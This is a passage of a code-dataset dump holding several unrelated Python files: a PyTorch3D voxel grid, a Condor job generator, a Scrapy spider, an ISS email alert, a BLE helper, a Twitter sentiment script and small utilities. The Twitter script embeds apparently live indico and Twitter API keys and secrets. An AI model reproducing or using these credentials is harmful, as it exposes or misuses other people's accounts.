align_corners=self.align_corners,\n padding_mode=self.padding,\n mode=self.mode,\n )\n c = interpolate_plane(\n points[..., 1:],\n grid_values.matrix_components_yz,\n align_corners=self.align_corners,\n padding_mode=self.padding,\n mode=self.mode,\n ) * interpolate_line(\n points[..., :1],\n grid_values.vector_components_x,\n align_corners=self.align_corners,\n padding_mode=self.padding,\n mode=self.mode,\n )\n # pyre-ignore[28]\n feats = torch.cat((a, b, c), axis=-1)\n\n # reduce the result from\n # (n_grids, n_points, n_components) to (n_grids, n_points, n_features)\n if grid_values.basis_matrix is not None:\n # (n_grids, n_points, n_features) =\n # (n_grids, n_points, total_n_components) x\n # (n_grids, total_n_components, n_features)\n return torch.bmm(feats, grid_values.basis_matrix)\n # pyre-ignore[28]\n return feats.sum(axis=-1, keepdim=True)\n\n def get_shapes(self) -> Dict[str, Tuple]:\n if self.matrix_reduction is False and self.n_features != 1:\n raise ValueError(\"Cannot set matrix_reduction=False and n_features to != 1\")\n if self.distribution_of_components is None and 
self.n_components is None:\n raise ValueError(\n \"You need to provide n_components or distribution_of_components\"\n )\n if (\n self.distribution_of_components is not None\n and self.n_components is not None\n ):\n raise ValueError(\n \"You cannot define n_components and distribution_of_components\"\n )\n # pyre-ignore[58]\n if self.distribution_of_components is None and self.n_components % 3 != 0:\n raise ValueError(\"n_components must be divisible by 3\")\n if self.distribution_of_components is None:\n # pyre-ignore[58]\n calculated_distribution_of_components = [\n self.n_components // 3 for _ in range(3)\n ]\n else:\n calculated_distribution_of_components = self.distribution_of_components\n\n shape_dict = {\n \"vector_components_x\": (\n calculated_distribution_of_components[1],\n self.resolution[0],\n ),\n \"vector_components_y\": (\n calculated_distribution_of_components[2],\n self.resolution[1],\n ),\n \"vector_components_z\": (\n calculated_distribution_of_components[0],\n self.resolution[2],\n ),\n \"matrix_components_xy\": (\n calculated_distribution_of_components[0],\n self.resolution[0],\n self.resolution[1],\n ),\n \"matrix_components_yz\": (\n calculated_distribution_of_components[1],\n self.resolution[1],\n self.resolution[2],\n ),\n \"matrix_components_xz\": (\n calculated_distribution_of_components[2],\n self.resolution[0],\n self.resolution[2],\n ),\n }\n if self.matrix_reduction:\n shape_dict[\"basis_matrix\"] = (\n sum(calculated_distribution_of_components),\n self.n_features,\n )\n\n return shape_dict\n\n\nclass VoxelGridModule(Configurable, torch.nn.Module):\n \"\"\"\n A wrapper torch.nn.Module for the VoxelGrid classes, which\n contains parameters that are needed to train the VoxelGrid classes.\n\n Members:\n voxel_grid_class_type: The name of the class to use for voxel_grid,\n which must be available in the registry. Default FullResolutionVoxelGrid.\n voxel_grid: An instance of `VoxelGridBase`. This is the object which\n this class wraps.\n extents: 3-tuple of a form (width, height, depth), denotes the size of the grid\n in world units.\n translation: 3-tuple of float. The center of the volume in world units as (x, y, z).\n init_std: Parameters are initialized using the gaussian distribution\n with mean=init_mean and std=init_std. Default 0.1\n init_mean: Parameters are initialized using the gaussian distribution\n with mean=init_mean and std=init_std. Default 0.\n \"\"\"\n\n voxel_grid_class_type: str = \"FullResolutionVoxelGrid\"\n voxel_grid: VoxelGridBase\n\n extents: Tuple[float, float, float] = 1.0\n translation: Tuple[float, float, float] = (0.0, 0.0, 0.0)\n\n init_std: float = 0.1\n init_mean: float = 0\n\n def __post_init__(self):\n super().__init__()\n run_auto_creation(self)\n n_grids = 1 # Voxel grid objects are batched. We need only a single grid.\n shapes = self.voxel_grid.get_shapes()\n params = {\n name: torch.normal(\n mean=torch.zeros((n_grids, *shape)) + self.init_mean,\n std=self.init_std,\n )\n for name, shape in shapes.items()\n }\n self.params = torch.nn.ParameterDict(params)\n\n def forward(self, points: torch.Tensor) -> torch.Tensor:\n \"\"\"\n Evaluates points in the world coordinate frame on the voxel_grid.\n\n Args:\n points (torch.Tensor): tensor of points that you want to query\n of a form (n_points, 3)\n Returns:\n torch.Tensor of shape (n_points, n_features)\n \"\"\"\n locator = VolumeLocator(\n batch_size=1,\n # The resolution of the voxel grid does not need to be known\n # to the locator object. 
It is easiest to fix the resolution of the locator.\n # In particular we fix it to (2,2,2) so that there is exactly one voxel of the\n # desired size. The locator object uses (z, y, x) convention for the grid_size,\n # and this module uses (x, y, z) convention so the order has to be reversed\n # (irrelevant in this case since they are all equal).\n # It is (2, 2, 2) because the VolumeLocator object behaves like\n # align_corners=True, which means that the points are in the corners of\n # the volume. So in the grid of (2, 2, 2) there is only one voxel.\n grid_sizes=(2, 2, 2),\n # The locator object uses (x, y, z) convention for the\n # voxel size and translation.\n voxel_size=self.extents,\n volume_translation=self.translation,\n device=next(self.params.values()).device,\n )\n grid_values = self.voxel_grid.values_type(**self.params)\n # voxel grids operate with extra n_grids dimension, which we fix to one\n return self.voxel_grid.evaluate_world(points[None], grid_values, locator)[0]\n","sub_path":"pytorch3d/implicitron/models/implicit_function/voxel_grid.py","file_name":"voxel_grid.py","file_ext":"py","file_size_in_byte":21608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"569746877","text":"import sys\n\ndef drop_interval(subFile, iter, start, end):\n inputFile = \"Interval.\" + str(iter) + \".txt\"\n subFile += \"Arguments = \" + inputFile + \"\\n\"\n subFile += \"Queue\\n\"\n f = open(inputFile, \"w\")\n f.write(str(start))\n f.write(\" \")\n f.write(str(end))\n f.close()\n \n return subFile\n \n\nif __name__==\"__main__\":\n \n subFile = \"\"\"\n Universe = vanilla\n Executable = d:\\\\univ\\\\code\\\\y4se1\\\\pdc\\\\lab3\\\\ex2\\\\prime\\\\Debug\\\\prime.exe\n Log = prime.$(Process).log.txt\n Output = prime.$(Process).out.txt\n Error = prime.$(Process).err.txt\n transfer_input_files = Interval.$(Process).txt\n should_transfer_files = YES\n when_to_transfer_output = ON_EXIT\n \"\"\"\n\n print(subFile)\n \n if(len(sys.argv) < 4):\n print(\"Usage: {0} lStart lEnd nrChunks\".format(sys.argv[0]))\n exit(1)\n \n lStart = int(sys.argv[1])\n lEnd = int(sys.argv[2])\n nrChunks = int(sys.argv[3])\n intervalSize = (lEnd - lStart) / nrChunks\n \n start = lStart\n for i in range(0, nrChunks):\n end = start + intervalSize\n subFile = drop_interval(subFile, i, start, end)\n start = end\n \n f = open(\"prime.sub\", \"w\")\n f.write(subFile)\n f.close()","sub_path":"y4se1/pdc/lab3/ex2/c/flow.py","file_name":"flow.py","file_ext":"py","file_size_in_byte":1223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"91086556","text":"# _*_ coding: utf-8 _*_\n\"\"\"This file is a GetHired spider created on top of the ATSSpider\nscrapy crawl gethired -a url=\"https://carekinesis.gethired.com/\" -a mining_job_id=999 -a iteration=1 -a extract=1\nsample url:\n https://carekinesis.gethired.com/\n https://cdrnys.gethired.com/\n\"\"\"\nfrom re import compile\n\nfrom scrapy.selector import Selector\nfrom scrapy.http import Request\n\nfrom brightcorp.base.atsspiders import ATSSpider\nfrom brightcorp.items import BrightcorpItemLoader\nfrom brightcorp.processors import Prefix, RemoveEmptyTags\n\n\nclass GetHired(ATSSpider):\n\n name = \"gethired\"\n ref_re = compile(\"job/(.*)\")\n\n def parse(self, response):\n sel = Selector(response)\n jobs = sel.xpath(\"//ul[@id='jobs']/li\")\n for job in jobs:\n job_link = job.xpath(\"./a/@href\").extract()\n if job_link:\n meta = {\n 'title': job.xpath(\n 
\"./a[not(contains(@class,'toggle'))]/text()\"\n ).extract(),\n }\n yield Request(\n job_link[0], meta=meta, callback=self.parse_job_callback()\n )\n\n def parse_job(self, response):\n loader = BrightcorpItemLoader(response=response)\n loader.add_value('url', response.url)\n loader.add_value('title', response.meta['title'])\n loader.add_xpath(\n 'company',\n \"/h2/following-sibling::table/tbody/tr[2]/td/strong/a/text()\"\n )\n loader.add_xpath(\n 'description',\n \"//h2/following-sibling::node()[not(self::table)]\",\n RemoveEmptyTags()\n )\n loader.add_xpath(\n 'location',\n \"//a[contains(@href,'location')]/text()\"\n )\n loader.add_value(\n 'referencenumber', response.url, Prefix(\"%s-\" % self.name),\n re=self.ref_re\n )\n yield loader.load_item()\n","sub_path":"brightcorp/brightcorp/spiders/gethired.py","file_name":"gethired.py","file_ext":"py","file_size_in_byte":1955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"546640349","text":"import requests\nfrom datetime import datetime\nimport smtplib\nimport time\n\nMY_EMAIL = 'nawodya135@gmail.com'\nMY_PASSWORD = 'EMAIL_PASSWORD'\n\nMY_LAT = 7.5554942\nMY_LONG = 80.7137847\n\n\ndef is_iss_overhead():\n r = requests.get('http://api.open-notify.org/iss-now.json')\n r.raise_for_status()\n data = r.json()\n\n iss_latitude = float(data['iss_position']['latitude'])\n iss_longitude = float(data['iss_position']['longitude'])\n\n if MY_LAT -5 <= iss_latitude <= MY_LAT + 5 and MY_LONG - 5 <= iss_longitude <= MY_LONG + 5:\n return True\n\ndef is_night():\n\n parameters = {\n 'lat' : MY_LAT,\n 'lng': MY_LONG,\n 'formatted':0,\n }\n response = requests.get('https://api.sunrise-sunset.org/json', params=parameters)\n response.raise_for_status()\n\n data = response.json()\n sunrise = int(data['results']['sunrise'].split(\"T\")[1].split(\":\")[0])\n sunset = int(data['results']['sunset'].split('T')[1].split(':')[0])\n \n time_now = datetime.now().hour\n \n if time_now >= sunset or time_now <= sunrise:\n return True\n\nwhile True:\n time.sleep(60)\n if is_iss_overhead() and is_night():\n connection = smtplib.SMTP('smtp.gmail.com')\n connection.starttls()\n connection.login(MY_EMAIL, MY_PASSWORD)\n connection.sendmail(\n from_addr='nawody135@gmail.com',\n to_addrs=MY_EMAIL,\n msg=\"Subject: Look Up 👆 \\n\\n The ISS is above you in the sky..\"\n )\n else:\n print(\"ISS is not above you in the sky..\")\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"128153612","text":"import asyncio\nimport logging\nimport platform\n\nfrom bleak import BleakScanner, BleakClient\nfrom bleak.backends.device import BLEDevice\n\n\nasync def find_device(name: str, timeout: float = 5) -> BLEDevice:\n \"\"\"Quickly find BLE device address by friendly device name.\n\n This is an alternative to bleak.discover. 
Instead of waiting a long time to\n scan everything, it returns as soon as it finds any device with the\n requested name.\n\n Arguments:\n name (str):\n Friendly device name.\n timeout (float):\n When to give up searching.\n\n Returns:\n BLEDevice: Matching device.\n\n Raises:\n asyncio.TimeoutError:\n Device was not found within the timeout.\n \"\"\"\n print(\"Searching for {0}\".format(name))\n\n # Flag raised by detection of a device\n device_discovered = False\n\n def set_device_discovered(*args):\n nonlocal device_discovered\n device_discovered = True\n\n # Create scanner object and register callback to raise discovery flag\n scanner = BleakScanner()\n scanner.register_detection_callback(set_device_discovered)\n\n # Start the scanner\n await scanner.start()\n\n INTERVAL = 0.1\n\n # Sleep until a device of interest is discovered. We cheat by using the\n # cross-platform get_discovered_devices() ahead of time, instead of waiting\n # for the whole discover() process to complete. We call it every time\n # a new device is detected by the register_detection_callback.\n for i in range(round(timeout/INTERVAL)):\n # If device_discovered flag is raised, check if it's the right one.\n if device_discovered:\n # Unset the flag so we only check if raised again.\n device_discovered = False\n # Check if any of the devices found so far has the expected name.\n devices = await scanner.get_discovered_devices()\n for dev in devices:\n # HACK: work around bleak bug in Windows\n if platform.system() == 'Windows':\n response = scanner._scan_responses.get(dev.details.BluetoothAddress)\n if response:\n dev.name = response.Advertisement.LocalName\n # If the name matches, stop scanning and return.\n if name == dev.name:\n await scanner.stop()\n return dev\n # Await until we check again.\n await asyncio.sleep(INTERVAL)\n\n # If we are here, scanning has timed out.\n await scanner.stop()\n raise asyncio.TimeoutError(\n \"Could not find {0} in {1} seconds\".format(name, timeout)\n )\n\n\nclass BLEConnection():\n \"\"\"Configure BLE, connect, send data, and handle receive events.\"\"\"\n\n def __init__(self, char_rx_UUID, char_tx_UUID, mtu, **kwargs):\n \"\"\"Initializes and configures connection settings.\n\n Arguments:\n char_rx_UUID (str):\n UUID for RX.\n char_rx_UUID (str):\n UUID for TX.\n mtu (int):\n Maximum number of bytes per write operation.\n\n \"\"\"\n # Save given settings\n self.char_rx_UUID = char_rx_UUID\n self.char_tx_UUID = char_tx_UUID\n self.mtu = mtu\n self.connected = False\n\n # Get a logger and set at given level\n self.logger = logging.getLogger('BLERequestsConnection')\n handler = logging.StreamHandler()\n formatter = logging.Formatter(\n '%(asctime)s: %(levelname)7s: %(message)s'\n )\n handler.setFormatter(formatter)\n self.logger.addHandler(handler)\n self.logger.setLevel(logging.WARNING)\n\n super().__init__(**kwargs)\n\n def data_handler(self, sender, data):\n \"\"\"Handles new incoming data.\n\n This is usually overridden by a mixin class.\n\n Arguments:\n sender (str):\n Sender uuid.\n data (bytes):\n Bytes to process.\n \"\"\"\n self.logger.debug(\"DATA {0}\".format(data))\n\n def disconnected_handler(self, client: BleakClient):\n \"\"\"Handles disconnected event.\"\"\"\n self.logger.debug(\"Disconnected.\")\n self.connected = False\n\n async def connect(self, device: BLEDevice):\n \"\"\"Connects to a BLE device.\n\n Arguments:\n device (BLEDevice):\n Client device\n \"\"\"\n\n print(\"Connecting to\", device)\n self.client = BleakClient(device)\n await 
self.client.connect(disconnected_callback=self.disconnected_handler)\n await self.client.start_notify(self.char_tx_UUID, self.data_handler)\n print(\"Connected successfully!\")\n self.connected = True\n\n async def disconnect(self):\n \"\"\"Disconnects the client from the server.\"\"\"\n await self.client.stop_notify(self.char_tx_UUID)\n if self.connected:\n self.logger.debug(\"Disconnecting...\")\n await self.client.disconnect()\n\n async def write(self, data, pause=0.05, with_response=False):\n \"\"\"Write bytes to the server, split to chunks of maximum mtu size.\n\n Arguments:\n data (bytearray):\n Data to be sent to the server.\n pause (float):\n Time between chunks of data.\n with_response (bool):\n Write with or without reponse.\n \"\"\"\n # Chop data into chunks of maximum tranmission size\n chunks = [data[i: i + self.mtu] for i in range(0, len(data), self.mtu)]\n\n # Send the chunks one by one\n for chunk in chunks:\n self.logger.debug(\n \"TX CHUNK: {0}, {1} response\".format(\n chunk, \"with\" if with_response else \"without\"\n )\n )\n # Send one chunk\n await self.client.write_gatt_char(\n self.char_rx_UUID,\n bytearray(chunk),\n with_response\n )\n # Give server some time to process chunk\n await asyncio.sleep(pause)\n\n\nclass BLERequestsConnection(BLEConnection):\n \"\"\"Sends messages and awaits replies of known length.\n\n This can be used for devices with known commands and known replies, such\n as some bootloaders to update firmware over the air.\n \"\"\"\n\n def __init__(self, UUID):\n \"\"\"Initialize the BLE Connection.\"\"\"\n self.reply_ready = asyncio.Event()\n self.prepare_reply()\n\n super().__init__(UUID, UUID, 1024)\n\n def data_handler(self, sender, data):\n \"\"\"Handles new incoming data and raise event when a new reply is ready.\n\n Arguments:\n sender (str):\n Sender uuid.\n data (bytes):\n Bytes to process.\n \"\"\"\n self.logger.debug(\"DATA {0}\".format(data))\n self.reply = data\n self.reply_ready.set()\n\n def prepare_reply(self):\n \"\"\"Clears existing reply and wait event.\n\n This is usually called prior to the write operation, to ensure we\n receive some of the bytes while are still awaiting the sending process.\n \"\"\"\n self.reply = None\n self.reply_ready.clear()\n\n async def wait_for_reply(self, timeout=None):\n \"\"\"Awaits for given number of characters since prepare_reply.\n\n Arguments:\n timeout (float or None):\n Time out to await. Same as asyncio.wait_for.\n\n Returns:\n bytearray: The reply.\n\n Raises\n TimeOutError. 
Same as asyncio.wait_for.\n        \"\"\"\n        # Await for the reply ready event to be raised.\n        await asyncio.wait_for(self.reply_ready.wait(), timeout)\n\n        # Return reply and clear internal buffer\n        reply = self.reply\n        self.prepare_reply()\n        return reply\n","sub_path":"pybricksdev/ble.py","file_name":"ble.py","file_ext":"py","file_size_in_byte":7766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"253724801","text":"import json\nimport urllib\nimport indicoio\nfrom application_only_auth import Client\n\nindicoio.config.api_key = '5aeda81420d27634e0fff46cab9509b3'\nTWITTER_CONSUMER_KEY = 's0bSUZphHdrbckdSFxmS83AV0'\nTWITTER_CONSUMER_SECRET = 'Y8NfaqFnhYhj8lBH4aYXAb85GdqyLSgumuApcjyjZPelnSRRyX'\n\nclass TweetScrape:\n    def __init__(self):\n        self.client = Client(TWITTER_CONSUMER_KEY, TWITTER_CONSUMER_SECRET)\n        self.status = None\n\n    def get_twitter_sentiment(self, handle):\n        tweets = self.get_tweets(handle)\n        raw_tweets = [tweet['text'] for tweet in tweets['statuses']]\n        return self.get_sentiment_average(raw_tweets)\n\n    def get_tweets(self, handle):\n        search_string = 'https://api.twitter.com/1.1/search/tweets.json?'\n        search_string += 'q='+urllib.quote(handle)\n        search_string += '&count=100'\n        tweets = self.client.request(search_string)\n        self.status = self.client.rate_limit_status()\n        return tweets\n\n    def get_sentiment_average(self, raw_tweets):\n        # Will give a number from 0 to 1 based on how negative or positive each tweet is\n        sentiment_scores = indicoio.sentiment_hq(raw_tweets)\n        avg = sum(sentiment_scores) / len(sentiment_scores)\n        return avg\n","sub_path":"tweetscrape/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"237667027","text":"\"\"\"\nDefine a class that has a class attribute and an instance attribute with the same name\n\"\"\"\n\n\nclass Person(object):\n    name = \"haha\"\n\n    def __init__(self, name=None):\n        self.name = name\n\n\njerry = Person(\"Jerrfy\")\nprint(\"%s name is %s\" % (Person.name, jerry.name))\n\nprint(\"-------\")\n\n# Two ways to set the instance attribute: via the constructor above, or by assigning directly\nnicio = Person()\nnicio.name = \"fsdf\"\nprint(\"%s name is %s\" % (Person.name, nicio.name))","sub_path":"20.py","file_name":"20.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"584576178","text":"import json\nimport unittest\n\nfrom ovos_tskill_fakewiki import FakeWikiSkill\nfrom ovos_utils.messagebus import FakeBus, Message\n\n\nclass TestDialog(unittest.TestCase):\n    def setUp(self):\n        self.bus = FakeBus()\n        self.bus.emitted_msgs = []\n\n        def get_msg(msg):\n            self.bus.emitted_msgs.append(json.loads(msg))\n\n        self.bus.on(\"message\", get_msg)\n\n        self.skill = FakeWikiSkill()\n        self.skill._startup(self.bus, \"wiki.test\")\n\n        self.skill.has_context = False\n\n        def set_context(message):\n            self.skill.has_context = True\n\n        def unset_context(message):\n            self.skill.has_context = False\n\n        self.bus.on('add_context', set_context)\n        self.bus.on('remove_context', unset_context)\n\n    def test_continuous_dialog(self):\n        self.bus.emitted_msgs = []\n\n        # \"ask the wiki X\"\n        self.assertFalse(self.skill.has_context)\n        self.skill.handle_search(Message(\"search_fakewiki.intent\",\n                                         {\"query\": \"what is the speed of light\"}))\n\n        self.assertEqual(self.bus.emitted_msgs[0],\n                         {'context': {'skill_id': 'wiki.test'},\n                          'data': {'context': 'wiki_testFakeWikiKnows',\n                                   'origin': '',\n                                   'word': 'what is the speed of light'},\n                          'type': 'add_context'})\n        self.assertEqual(self.bus.emitted_msgs[-1],\n                         {'context': {'skill_id': 'wiki.test'},\n                          'data': {'expect_response': False,\n                                   'lang': 'en-us',\n                                   'meta': {'skill': 'wiki.test'},\n                                   'utterance': 'answer 1'},\n                          'type': 'speak'})\n\n        # \"tell me more\"\n        self.assertTrue(self.skill.has_context)\n        self.skill.handle_tell_more(Message(\"FakeWikiMore\"))\n\n        self.assertEqual(self.bus.emitted_msgs[-1],\n                         {'context': {'skill_id': 'wiki.test'},\n                          'data': {'expect_response': False,\n                                   'lang': 'en-us',\n                                   'meta': {'skill': 'wiki.test'},\n                                   'utterance': 'answer 2'},\n                          'type': 'speak'})\n        self.assertTrue(self.skill.has_context)\n\n        # \"tell me more\" - no more data dialog\n        self.skill.handle_tell_more(Message(\"FakeWikiMore\"))\n\n        self.assertEqual(self.bus.emitted_msgs[-2][\"type\"], \"speak\")\n        self.assertEqual(self.bus.emitted_msgs[-2][\"data\"][\"meta\"],\n                         {'data': {}, 'dialog': 'thats all', 'skill': 'wiki.test'})\n\n        # removal of context to disable \"tell me more\"\n        self.assertEqual(self.bus.emitted_msgs[-1],\n                         {'context': {'skill_id': 'wiki.test'},\n                          'data': {'context': 'wiki_testFakeWikiKnows'},\n                          'type': 'remove_context'})\n        self.assertFalse(self.skill.has_context)\n","sub_path":"test/unittests/common_query/test_continuous_dialog.py","file_name":"test_continuous_dialog.py","file_ext":"py","file_size_in_byte":3091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"564909072","text":"\"\"\"\nVerify that ``python manage.py wait_for_database`` works fine.\n\"\"\"\nfrom unittest.mock import patch\nfrom django.db.utils import OperationalError\n\nimport pytest\n\nfrom django_probes.management.commands.wait_for_database \\\n    import wait_for_database\n\nCLI_PARAMS = {\n    'wait_when_down': 1,\n    'wait_when_alive': 1,\n    'stable': 3,\n    'timeout': 1,\n    'database': 'default',\n}\n\n\n@patch('django.db.connection.cursor', side_effect=OperationalError())\ndef test_exception_caught_when_connection_absent(mock_db_cursor):\n    \"\"\"\n    When database connection is absent related errors are caught.\n    \"\"\"\n    with pytest.raises(TimeoutError):\n        wait_for_database(**CLI_PARAMS)\n\n    assert mock_db_cursor.called\n\n\n@patch('django.db.connection.cursor')\ndef test_loops_stable_times(mock_db_cursor):\n    \"\"\"\n    Database connection must be stable some consecutive times in a row.\n    \"\"\"\n    wait_for_database(**CLI_PARAMS)\n\n    assert mock_db_cursor.call_count == CLI_PARAMS['stable'] + 1\n","sub_path":"tests/unit/test_cli.py","file_name":"test_cli.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"436053810","text":"# coding: utf-8\nfrom __future__ import unicode_literals\n\nfrom char_feature_extractor import CharFeatureExtractor\n\n\nclass CharKeywordFeatureExtractor(CharFeatureExtractor):\n    \"\"\"\n    Base features are characters; this adds keyword features.\n    \"\"\"\n\n    def __init__(self, content='', tagged_content='', keyword='', left_char_size=0, right_char_size=0):\n        assert keyword != '' and (left_char_size != 0 or right_char_size != 0)\n        self._keyword = keyword.decode('utf-8') if type(keyword).__name__ == 'str' else keyword\n        self._l_char_size = left_char_size\n        self._r_char_size = right_char_size\n        super(CharKeywordFeatureExtractor, self).__init__(\n            content=content, tagged_content=tagged_content)\n\n    def add_features(self, base_features):\n        content = ''.join(base_features)\n        features = []\n        for index in xrange(len(base_features)):\n            found = self._find_keyword_in_context(index, content, self._keyword, 
self._l_char_size, self._r_char_size)\n features.append([found])\n return features\n\n @staticmethod\n def _find_keyword_in_context(index, content, keyword, left_char_size, right_char_size):\n left_border = index - left_char_size if index - left_char_size >= 0 else 0\n right_border = index + right_char_size if index + right_char_size < len(content) else len(content) - 1\n context = content[left_border: right_border + 1]\n found = 1 if context.find(keyword) != -1 else 0\n return found\n","sub_path":"extract_framework/feature_extractors/char_keyword_feature_extractor.py","file_name":"char_keyword_feature_extractor.py","file_ext":"py","file_size_in_byte":1487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"291903200","text":"\"\"\"\nScript: Get raster info\nAuthor: Colin Stief\n\n\"\"\"\n\n## Import libraries\ntry:\n # Core\n import os\n import sys\n import subprocess\n\n # User\n import GeoUtils\n\nexcept ImportError:\n print('Could not import necessary libraries')\n sys.exit()\n\n\ndef main():\n \"\"\"Main script\"\"\"\n\n ## Get list of shapefiles from data directory\n data_directory = os.path.realpath('../maryland/imagery/Ortho_2012')\n # data_dict = GeoUtils.horde_files(data_directory, ['jp2'])\n data_dict = GeoUtils.horde_files(data_directory, ['tif'])\n\n ## Loop through list and add to PostGIS\n for name, fullpath in data_dict.items():\n\n print('Processing ' + fullpath)\n\n # subprocess.call([\n # 'gdalwarp',\n # '-s_srs', 'EPSG:2261', # Source projection; this uses custom .prj file\n # '-t_srs', 'EPSG:4326', # Target projection\n # fullpath,\n # os.path.join(data_directory, name + '_rprj.tif') # Output raster\n # ])\n\n subprocess.call([\n 'gdaladdo',\n '-r', 'nearest',\n fullpath,\n '2 4 8 16'\n ])\n\n # subprocess.call([\n # 'gdal_translate',\n # '-of', 'GTiff',\n # '-co', 'TILED=YES',\n # '-co', 'COMPRESS=NONE',\n # '-co', 'PHOTOMETRIC=RGB',\n # fullpath,\n # os.path.join(data_directory, name + '.tif')\n # ])\n\n\n\n\n## Prevent run on import\nif __name__ == '__main__':\n main()\n","sub_path":"python/gis/gdal-ogr/raster_convert.py","file_name":"raster_convert.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"411546086","text":"from nsepy import get_history\r\nimport nsepy as nsepy\r\nfrom datetime import date,timedelta\r\n\r\ntoday_date = date.today()-timedelta(days=1)\r\nprint(today_date)\r\n\r\nexpiry = sorted(nsepy.get_expiry_date(year=date.today().year, month=date.today().month))\r\nprint(expiry)\r\n\r\nfor i in expiry:\r\n if i >= today_date:\r\n expiry_option = i\r\n break\r\nprint(expiry_option)\r\n\r\noption = ['CE','PE']\r\n\r\n# generating strike price\r\nstrike = []\r\nfor i in range(15000, 15200, 50):\r\n strike.append(i)\r\nprint(strike)\r\n\r\n\r\noi_ce = {}\r\noi_pe = {}\r\n\r\n\r\n\r\nfor opt in option:\r\n for stk in strike:\r\n\r\n nifty_opt = get_history(symbol=\"NIFTY\",\r\n start=today_date,\r\n end=today_date,\r\n index=True,\r\n option_type=opt,\r\n strike_price=stk,\r\n expiry_date=expiry_option)\r\n # print(nifty_opt)\r\n\r\n for i in range(len(nifty_opt)):\r\n\r\n # print(opt,stk,end=\" \")\r\n # print(nifty_opt.index[i],end=' ')\r\n # print(nifty_opt['Open Interest'][i])\r\n oi=nifty_opt['Open Interest'][i]\r\n # print(oi)\r\n\r\n if opt == \"CE\":\r\n oi_ce[stk] = oi\r\n # print(oi_ce)\r\n elif opt == \"PE\":\r\n oi_pe[stk] = oi\r\n # print(oi_pe)\r\n\r\nprint(oi_pe)\r\nprint(oi_ce)\r\n\r\ndict2 = 
{'CE': oi_ce}\r\nprint(dict2)\r\n\r\ndict3 = {'PE': oi_pe}\r\nprint(dict3)\r\n\r\ndict4 = {'CE':oi_ce,'PE':oi_pe }\r\nprint(dict4)\r\n\r\nlist1 = [dict2, dict3]\r\nprint(list1)\r\ntoday_date1 = str(today_date)\r\nprint(today_date1)\r\n\r\noi_dict = {today_date1 : list1}\r\nprint(oi_dict)\r\n\r\noi_dict1 = {today_date1 : dict4}\r\nprint(oi_dict1)\r\n\r\nprint(oi_dict1['2021-06-03']['CE'][15050])\r\n","sub_path":"beta1/nse_oi.py","file_name":"nse_oi.py","file_ext":"py","file_size_in_byte":1796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"259601495","text":"# Following the template given by pypa \n# github.com/pypa/sampleproject\n\nfrom setuptools import setup, find_packages\n\nfrom os import path\n\nhere = path.abspath(path.dirname(__file__))\n\nwith open(path.join(here, \"README.md\"), encoding=\"utf-8\") as f:\n    LONG_DESCR = f.read()\n\n\nsetup(\n    name=\"testgen\",\n    author=\"Sam Morley\",\n    version=\"0.1.0\",\n    description=\"Automatic unit test generator for Python code\",\n    long_description=LONG_DESCR,\n    long_description_content_type=\"text/markdown\",\n    url=\"https://github.com/inakleinbottle/testgen\",\n    author_email=\"sam@inakleinbottle.com\",\n    packages=find_packages(exclude=[\"tests\"]),\n    python_requires=\">=3.6\",\n    extras_require={\n        \"test\": [\"pytest\"],\n    },\n    entry_points={\n        \"console_scripts\": [\"testgen=testgen.cli:main\"],\n    }\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"73286301","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport pickle\n\nd = dict(name='bob', age=20, score=88)\nprint(d)\nda = pickle.dumps(d)\nprint(da)\n\nreborn = pickle.loads(da)\nprint(reborn)\n\n########################\nimport json\nd = dict(name='Sun', age=40, score=58)\nprint(d)\nda = json.dumps(d)\nprint('JSON Data is a str:{}'.format(da))\nreborn = json.loads(da)\nprint(reborn)\n\nclass Stu(object):\n    def __init__(self, name, age, score):\n        self.name = name\n        self.age = age\n        self.score = score\n    \n    def __str__(self):\n        return 'Stu object(%s, %s, %s)'%(self.name, self.age, self.score)\n\ns = Stu('Hua', 35, 99)\nstd_data = json.dumps(s, default=lambda obj:obj.__dict__)\nprint('Dump Stu:', std_data)\nrebuild = json.loads(std_data, object_hook=lambda d:Stu(d['name'],d['age'],d['score']))\nprint(rebuild)\nre = json.loads(std_data)\nprint(re)","sub_path":"use_json.py","file_name":"use_json.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"440752023","text":"class Solution:\n\n    # @param s, a string\n    # @return an integer\n    def titleToNumber(self, s):\n        reverse, factor, number = s[::-1], 1, 0\n        for p in reverse:\n            number += (ord(p) - ord('A') + 1) * factor\n            factor *= 26\n        return number\n","sub_path":"leetcode/python/titleToNumber.py","file_name":"titleToNumber.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"156058826","text":"# -------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. 
